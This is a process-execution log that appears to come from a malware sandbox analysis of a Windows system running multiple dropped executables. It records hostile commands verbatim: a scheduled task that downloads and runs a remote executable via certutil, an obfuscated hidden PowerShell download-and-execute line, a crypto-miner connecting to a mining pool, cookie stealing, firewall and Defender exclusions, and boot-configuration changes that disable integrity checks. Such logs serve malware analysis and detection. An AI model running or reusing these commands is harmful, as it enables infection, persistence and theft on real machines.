C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:3752
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2784
-
C:\Users\Admin\AppData\Local\Temp\F2D9.exeC:\Users\Admin\AppData\Local\Temp\F2D9.exe1⤵
- Executes dropped EXE
PID:4132 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo MFbR2⤵PID:4200
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Declinante.html2⤵PID:4248
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:4296
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^vbzKnQFSqnlAJtUxNfEmiqqLJfcsIqUhKbnAvosGDfELCESlYcgqhNQcvIqpchlqDWPjFzXEXXVRvfoyblzjLTqXHrtOiokftEiFOGFFnJrfSYZuAVMkUYgKWSECgobOMFMRoCdQFOOwQKtJrX$" Quel.cab4⤵PID:5020
-
-
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.comSui.com Benedetto.txt4⤵PID:5188
-
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.comC:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt5⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.comC:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com6⤵PID:6908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 16447⤵
- Program crash
PID:4288
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
PID:5260
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F914.exeC:\Users\Admin\AppData\Local\Temp\F914.exe1⤵
- Executes dropped EXE
PID:4312
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:4332
-
C:\Users\Admin\AppData\Local\Temp\FABB.exeC:\Users\Admin\AppData\Local\Temp\FABB.exe1⤵
- Executes dropped EXE
PID:4376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ppbwgxsf\2⤵PID:4544
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vmipgfjn.exe" C:\Windows\SysWOW64\ppbwgxsf\2⤵PID:4628
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ppbwgxsf binPath= "C:\Windows\SysWOW64\ppbwgxsf\vmipgfjn.exe /d\"C:\Users\Admin\AppData\Local\Temp\FABB.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:4816
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ppbwgxsf "wifi internet conection"2⤵PID:4924
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ppbwgxsf2⤵PID:5032
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:3160
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4692
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4780
-
C:\Users\Admin\AppData\Local\Temp\F7C.exeC:\Users\Admin\AppData\Local\Temp\F7C.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4972
-
C:\Users\Admin\AppData\Local\Temp\10A6.exeC:\Users\Admin\AppData\Local\Temp\10A6.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5016 -
C:\Users\Admin\AppData\Local\Temp\10A6.exeC:\Users\Admin\AppData\Local\Temp\10A6.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:3872
-
-
C:\Windows\SysWOW64\ppbwgxsf\vmipgfjn.exeC:\Windows\SysWOW64\ppbwgxsf\vmipgfjn.exe /d"C:\Users\Admin\AppData\Local\Temp\FABB.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5096 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:4568
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k3⤵PID:1272
-
-
-
C:\Users\Admin\AppData\Local\Temp\1CCD.exeC:\Users\Admin\AppData\Local\Temp\1CCD.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3920 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
PID:4640
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:4964
-
-
C:\Users\Admin\AppData\Local\Temp\2615.exeC:\Users\Admin\AppData\Local\Temp\2615.exe1⤵
- Executes dropped EXE
PID:4800 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 3602⤵
- Program crash
PID:4320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 3402⤵
- Program crash
PID:1444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 3762⤵
- Program crash
PID:4636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 6162⤵
- Program crash
PID:5112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 6562⤵
- Program crash
PID:3548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 6962⤵
- Program crash
PID:4664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 5962⤵
- Program crash
PID:4672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 5762⤵
- Program crash
PID:4396
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 8082⤵
- Program crash
PID:4976
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 8642⤵
- Program crash
PID:5052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 9242⤵
- Program crash
PID:996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 9042⤵
- Program crash
PID:4456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 7162⤵
- Program crash
PID:4944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 6962⤵
- Program crash
PID:3760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 9362⤵
- Program crash
PID:5072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 9282⤵
- Program crash
PID:5012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 9722⤵
- Program crash
PID:4172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 8882⤵
- Program crash
PID:4424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 5762⤵
- Program crash
PID:5272
-
-
C:\Users\Admin\AppData\Local\Temp\2615.exe"C:\Users\Admin\AppData\Local\Temp\2615.exe"2⤵PID:5604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 3243⤵
- Program crash
PID:5696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 3043⤵
- Program crash
PID:5740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 3403⤵
- Program crash
PID:5784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 6243⤵
- Program crash
PID:5888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 6363⤵
- Program crash
PID:5940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 6483⤵
- Program crash
PID:6004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 6883⤵
- Program crash
PID:6060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 6043⤵
- Program crash
PID:6112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 7003⤵
- Program crash
PID:4448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 7243⤵
- Program crash
PID:3372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 7323⤵
- Program crash
PID:5144
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵PID:5176
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵PID:5332
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /15-153⤵PID:5528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 3604⤵
- Program crash
PID:5800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 4084⤵
- Program crash
PID:5876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 4244⤵
- Program crash
PID:6008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 6324⤵
- Program crash
PID:4480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 6204⤵
- Program crash
PID:4832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 7004⤵
- Program crash
PID:6140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 6084⤵
- Program crash
PID:4864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 6164⤵
- Program crash
PID:4392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 8204⤵
- Program crash
PID:5960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 8364⤵
- Program crash
PID:5620
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:5460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 8604⤵
- Program crash
PID:2920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 8844⤵
- Program crash
PID:5872
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 9684⤵
- Program crash
PID:3408
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 14244⤵
- Program crash
PID:5532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 13604⤵
- Program crash
PID:4388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 15004⤵
- Program crash
PID:5140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 15524⤵
- Program crash
PID:5972
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵PID:5684
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
PID:6824
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:6028
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:6804
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
PID:4584
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
PID:7156
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
PID:4896
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
PID:6368
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
PID:5044
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
PID:4584
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
PID:4956
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
PID:6992
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
PID:6860
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
PID:4256
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy5⤵
- Modifies boot configuration data using bcdedit
PID:4980
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 9924⤵
- Program crash
PID:5864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 13564⤵
- Program crash
PID:5380
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:6988
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵PID:3908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 13884⤵
- Program crash
PID:3232
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵PID:3208
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵PID:7008
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:7320
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 8884⤵
- Program crash
PID:1312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 15844⤵
- Program crash
PID:1132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 16124⤵
- Program crash
PID:8432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\29CF.exeC:\Users\Admin\AppData\Local\Temp\29CF.exe1⤵PID:4176
-
C:\Users\Admin\AppData\Local\Temp\is-JPJ11.tmp\29CF.tmp"C:\Users\Admin\AppData\Local\Temp\is-JPJ11.tmp\29CF.tmp" /SL5="$402C6,442598,358912,C:\Users\Admin\AppData\Local\Temp\29CF.exe"2⤵PID:4416
-
C:\Users\Admin\AppData\Local\Temp\is-DUVFK.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-DUVFK.tmp\kkkk.exe" /S /UID=lab2123⤵PID:2500
-
C:\Program Files\Microsoft Office 15\USVLFTFWJB\prolab.exe"C:\Program Files\Microsoft Office 15\USVLFTFWJB\prolab.exe" /VERYSILENT4⤵PID:4820
-
C:\Users\Admin\AppData\Local\Temp\is-VE9CT.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-VE9CT.tmp\prolab.tmp" /SL5="$10308,575243,216576,C:\Program Files\Microsoft Office 15\USVLFTFWJB\prolab.exe" /VERYSILENT5⤵PID:4440
-
-
-
C:\Users\Admin\AppData\Local\Temp\29-2109b-b17-e178b-237e38baf6717\ZHowysilegu.exe"C:\Users\Admin\AppData\Local\Temp\29-2109b-b17-e178b-237e38baf6717\ZHowysilegu.exe"4⤵PID:4920
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3dexlkr.oq2\GcleanerWW.exe /mixone & exit5⤵PID:4428
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exe & exit5⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exe6⤵PID:5516
-
C:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\aoxgl0p0.us0\privacytools5.exe7⤵PID:4840
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gf43fkbd.swn\setup.exe /8-2222 & exit5⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\gf43fkbd.swn\setup.exeC:\Users\Admin\AppData\Local\Temp\gf43fkbd.swn\setup.exe /8-22226⤵PID:5852
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Misty-Sky"7⤵PID:5996
-
-
C:\Program Files (x86)\Misty-Sky\7za.exe"C:\Program Files (x86)\Misty-Sky\7za.exe" e -p154.61.71.51 winamp-plugins.7z7⤵PID:5504
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Misty-Sky\setup.exe" -map "C:\Program Files (x86)\Misty-Sky\WinmonProcessMonitor.sys""7⤵PID:5376
-
C:\Program Files (x86)\Misty-Sky\setup.exe"C:\Program Files (x86)\Misty-Sky\setup.exe" -map "C:\Program Files (x86)\Misty-Sky\WinmonProcessMonitor.sys"8⤵PID:4980
-
-
-
C:\Program Files (x86)\Misty-Sky\7za.exe"C:\Program Files (x86)\Misty-Sky\7za.exe" e -p154.61.71.51 winamp.7z7⤵PID:5216
-
-
C:\Program Files (x86)\Misty-Sky\setup.exe"C:\Program Files (x86)\Misty-Sky\setup.exe" /8-22227⤵PID:6776
-
C:\Program Files (x86)\Misty-Sky\setup.exe"C:\Program Files (x86)\Misty-Sky\setup.exe" /8-22228⤵PID:4652
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\spa3dq5d.xwc\MultitimerFour.exe & exit5⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\spa3dq5d.xwc\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\spa3dq5d.xwc\MultitimerFour.exe6⤵PID:2500
-
C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1047⤵PID:5036
-
C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe" 1 3.1615014977.60432c41a19cc 1048⤵PID:5428
-
C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ERN40PGPT5\multitimer.exe" 2 3.1615014977.60432c41a19cc9⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\ilvtxsnctbv\1epgm04ajqq.exe"C:\Users\Admin\AppData\Local\Temp\ilvtxsnctbv\1epgm04ajqq.exe" /VERYSILENT10⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\is-SOE8K.tmp\1epgm04ajqq.tmp"C:\Users\Admin\AppData\Local\Temp\is-SOE8K.tmp\1epgm04ajqq.tmp" /SL5="$30378,870426,780800,C:\Users\Admin\AppData\Local\Temp\ilvtxsnctbv\1epgm04ajqq.exe" /VERYSILENT11⤵PID:5892
-
C:\Users\Admin\AppData\Local\Temp\is-D1EJA.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-D1EJA.tmp\winlthst.exe" test1 test112⤵PID:5168
-
C:\Users\Admin\AppData\Local\Temp\cAXWVPjtP.exe"C:\Users\Admin\AppData\Local\Temp\cAXWVPjtP.exe"13⤵PID:4696
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im cAXWVPjtP.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\cAXWVPjtP.exe" & del C:\ProgramData\*.dll & exit14⤵PID:6464
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im cAXWVPjtP.exe /f15⤵
- Kills process with taskkill
PID:4736
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 615⤵
- Delays execution with timeout.exe
PID:4100
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵PID:1716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵PID:7836
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zecjjrjtdtc\safebits.exe"C:\Users\Admin\AppData\Local\Temp\zecjjrjtdtc\safebits.exe" /S /pubid=1 /subid=45110⤵PID:5720
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\zecjjrjtdtc\safebits.exe11⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\ohvftwo31pj\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\ohvftwo31pj\askinstall24.exe"10⤵PID:5084
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe11⤵PID:6392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe12⤵
- Kills process with taskkill
PID:7124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zzqokg3bmo5\ajp2h4a1gsl.exe"C:\Users\Admin\AppData\Local\Temp\zzqokg3bmo5\ajp2h4a1gsl.exe" testparams10⤵PID:3076
-
C:\Users\Admin\AppData\Roaming\501nrhzmrs2\flfroysdezm.exe"C:\Users\Admin\AppData\Roaming\501nrhzmrs2\flfroysdezm.exe" /VERYSILENT /p=testparams11⤵PID:7112
-
C:\Users\Admin\AppData\Local\Temp\is-ATRND.tmp\flfroysdezm.tmp"C:\Users\Admin\AppData\Local\Temp\is-ATRND.tmp\flfroysdezm.tmp" /SL5="$2045C,404973,58368,C:\Users\Admin\AppData\Roaming\501nrhzmrs2\flfroysdezm.exe" /VERYSILENT /p=testparams12⤵PID:7164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v1pxyzxpk4h\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\v1pxyzxpk4h\Setup3310.exe" /Verysilent /subid=57710⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\is-93OC7.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-93OC7.tmp\Setup3310.tmp" /SL5="$30398,802346,56832,C:\Users\Admin\AppData\Local\Temp\v1pxyzxpk4h\Setup3310.exe" /Verysilent /subid=57711⤵PID:5296
-
C:\Users\Admin\AppData\Local\Temp\is-JP5V6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JP5V6.tmp\Setup.exe" /Verysilent12⤵PID:7056
-
